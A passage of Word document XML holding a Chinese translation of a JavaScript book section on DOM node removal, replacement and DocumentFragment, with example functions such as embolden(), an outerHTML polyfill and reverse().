        <w:t>＞元素（假设只有一行），让它们可单击，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>以便单击列标题，按该列对行排序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function makeSortable(table){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var headers=table.getElementsByTagName("th");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>headers.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(function(n){//</w:t>
      </w:r>
      <w:r>
        <w:t>嵌套函数来创建本地作用域</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>headers[i].onclick=function(){sortrows(table,n);};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}(i));//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>的值赋给局部变量</w:t>
      </w:r>
      <w:r>
        <w:t>n</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376" w:name="15_6_3_Shan_Chu_He_Ti_Huan_Jie_Dian_"/>
      <w:r>
        <w:t>15.6.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　删除和替换节点</w:t>
      </w:r>
      <w:bookmarkEnd w:id="376"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>removeC</w:t>
      </w:r>
      <w:r>
        <w:t>hild()</w:t>
      </w:r>
      <w:r>
        <w:t>方法是从文档树中删除一个节点。但是请小心：该方法不是在待删除的节点上调用，而是（就像其名字的一部分</w:t>
      </w:r>
      <w:r>
        <w:t>"child"</w:t>
      </w:r>
      <w:r>
        <w:t>所暗示的一样）在其父节点上调用。在父节点上调用该方法，并将需要删除的子节点作为方法参数传递给它。在文档中删除</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>节点，代码可以这样写：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n.parentNode.removeChild(n);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>replaceChild()</w:t>
      </w:r>
      <w:r>
        <w:t>方法删除一个子节点并用一个新的节点取而代之。在父节点上调用该方法，第一个参数是新节点，第二个参数是</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>需要代替的节点。例如，用一个文本字符串来替换节点</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>，代码可以这样写：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n.parentNode.replaceChild(document.createTextNode("[REDACTED]"),n);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>以下函数展示了</w:t>
      </w:r>
      <w:r>
        <w:t>replaceChild()</w:t>
      </w:r>
      <w:r>
        <w:t>的另一种用法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>用一个新的＜</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素替换</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>节点，并使</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>成为该元素的子节点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function embolden(n){//</w:t>
      </w:r>
      <w:r>
        <w:t>假如参数</w:t>
      </w:r>
      <w:r>
        <w:t>为字符串而不是节点，将其当做元素的</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(typeof n=="string")n=document.getElementById(n);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var parent=n.parentNode;//</w:t>
      </w:r>
      <w:r>
        <w:t>获得</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>的父节点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var b=document.createElement("b");//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>parent.replaceChild(b,n);//</w:t>
      </w:r>
      <w:r>
        <w:t>用该＜</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素替换节点</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>b.appendChild(n);//</w:t>
      </w:r>
      <w:r>
        <w:t>使</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>成为＜</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的子节点</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15.5.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　节介绍过元素的</w:t>
      </w:r>
      <w:r>
        <w:t>outerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性，也解</w:t>
      </w:r>
      <w:r>
        <w:t>释过在当前版本的</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>中还未实现它。例</w:t>
      </w:r>
      <w:r>
        <w:t>15-5</w:t>
      </w:r>
      <w:r>
        <w:t>展示了在</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>中（和其他任何支持</w:t>
      </w:r>
      <w:r>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器，要有一个可扩展的</w:t>
      </w:r>
      <w:r>
        <w:t>Element.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>对象，还要有一些方法来定义属性的</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>）如何来实现该属性。同时代码也展示了</w:t>
      </w:r>
      <w:r>
        <w:t>removeChild()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>cloneNode()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的实际用法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>15-5</w:t>
      </w:r>
      <w:r>
        <w:t>：使用</w:t>
      </w:r>
      <w:r>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>实现</w:t>
      </w:r>
      <w:r>
        <w:t>outerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>为那些不支持它的浏览器实现</w:t>
      </w:r>
      <w:r>
        <w:t>outerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>假设浏览器确实支持</w:t>
      </w:r>
      <w:r>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>，并有个可扩展的</w:t>
      </w:r>
      <w:r>
        <w:t>El</w:t>
      </w:r>
      <w:r>
        <w:t>ement.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>并且可以定义</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>outerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>存在，则直接返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(document.createElement("div").outerHTML)return;//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>所引用元素的外部</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function outerHTMLGetter(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var container=document.createElement("div");//</w:t>
      </w:r>
      <w:r>
        <w:t>虚拟元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>container.appendChild(this.cloneN</w:t>
      </w:r>
      <w:r>
        <w:t>ode(true));//</w:t>
      </w:r>
      <w:r>
        <w:t>复制到该虚拟节点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return container.innerHTML;//</w:t>
      </w:r>
      <w:r>
        <w:t>返回虚拟节点的</w:t>
      </w:r>
      <w:r>
        <w:t>innerHTML</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>用指定的值设置元素的外部</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function outerHTMLSetter(value){//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个虚拟元素，设置其内容为指定的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var container=document.createElement("div");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>container.innerHTML=value;//</w:t>
      </w:r>
      <w:r>
        <w:t>将虚拟元素中的节点全部移动到文档中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>while(container.firstChild)//</w:t>
      </w:r>
      <w:r>
        <w:t>循环，直到</w:t>
      </w:r>
      <w:r>
        <w:t>container</w:t>
      </w:r>
      <w:r>
        <w:t>没有子节点为止</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.parentNode.insertBefore(container.firstChild,this);//</w:t>
      </w:r>
      <w:r>
        <w:t>删除所被取代的节点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.parentNode.removeChild(this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>现在使用这两个函数作为所有</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>outerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性的</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果它存在则使用</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Object.defineProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，退而求其次，使用</w:t>
      </w:r>
      <w:r>
        <w:t>__defineGetter__()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>__defineSetter__()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(Object.defineProperty){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.defineProperty(Element.prototype,"outerHTML",{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>get:outerHTMLGetter,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>set:outerHTMLSetter,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>enumerable:false,configurable:true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Element.prototype.__defineGetter__(</w:t>
      </w:r>
      <w:r>
        <w:t>"outerHTML",outerHTMLGetter);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Element.prototype.__defineSetter__("outerHTML",outerHTMLSetter);</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377" w:name="15_6_4_Shi_Yong_DocumentFragment"/>
      <w:r>
        <w:t>15.6.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　使用</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="377"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>是一种特殊的</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>，它作为其他节点的一个临时的容器。像这样创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var frag=document.createDocumentFragment();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>像</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>节点一样，</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>是独立的，而不是任何其他文档的一部分。它的</w:t>
      </w:r>
      <w:r>
        <w:t>parentNode</w:t>
      </w:r>
      <w:r>
        <w:t>总是为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。但类似</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>，它可以有任意多的子节点，可以用</w:t>
      </w:r>
      <w:r>
        <w:t>appendChild()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>insertBefore()</w:t>
      </w:r>
      <w:r>
        <w:t>等方法来操作它们。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>的特殊之处在于它使得一组节点被当做一个节点看待：如果给</w:t>
      </w:r>
      <w:r>
        <w:t>appendChild()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>insertBefore()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>replaceChild()</w:t>
      </w:r>
      <w:r>
        <w:t>传递一个</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>，其实是将该文档片段的所有子节点插</w:t>
      </w:r>
      <w:r>
        <w:t>入到文档中，而非片段本身。（文档片段的子节点从片段移动到文档中，文档片段清空以便重用。）以下函数使用</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>来倒序排列一个节点的子节点：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>倒序排列节点</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>的子节点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function reverse(n){//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>作为临时容器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var f=document.createDocumentFragment();//</w:t>
      </w:r>
      <w:r>
        <w:t>从后至前循环子节点，将每一个子节点移动到文档片段中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//n</w:t>
      </w:r>
      <w:r>
        <w:t>的最后一个节点变成</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>的第一个节点，反之亦然</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>注意，给</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>添加一个节点，该节点自</w:t>
      </w:r>
      <w:r>
        <w:t>动地会从</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>中删除</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>while(n.lastChild)f.appendChild(n.lastChild);//</w:t>
      </w:r>
      <w:r>
        <w:t>最后，把</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>的所有子节点一次性全部移回</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n.appendChild(f);</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15-6</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性和</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>实现</w:t>
      </w:r>
      <w:r>
        <w:t>insertAdjacentHTML()</w:t>
      </w:r>
      <w:r>
        <w:t>方法（见</w:t>
      </w:r>
      <w:r>
        <w:t>15.5.1</w:t>
      </w:r>
      <w:r>
        <w:t>节）。它还定义一些名字更符合逻辑的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>插入函数，可以替换让人迷惑的</w:t>
      </w:r>
      <w:r>
        <w:t>insertAdjacentHTML()API</w:t>
      </w:r>
      <w:r>
        <w:t>。内部工具函数</w:t>
      </w:r>
      <w:r>
        <w:t>fragment()</w:t>
      </w:r>
      <w:r>
        <w:t>可能是代码中最有用的部分：它返回</w:t>
      </w:r>
      <w:r>
        <w:t>一个对指定</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>字符串文本进行解析后的</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
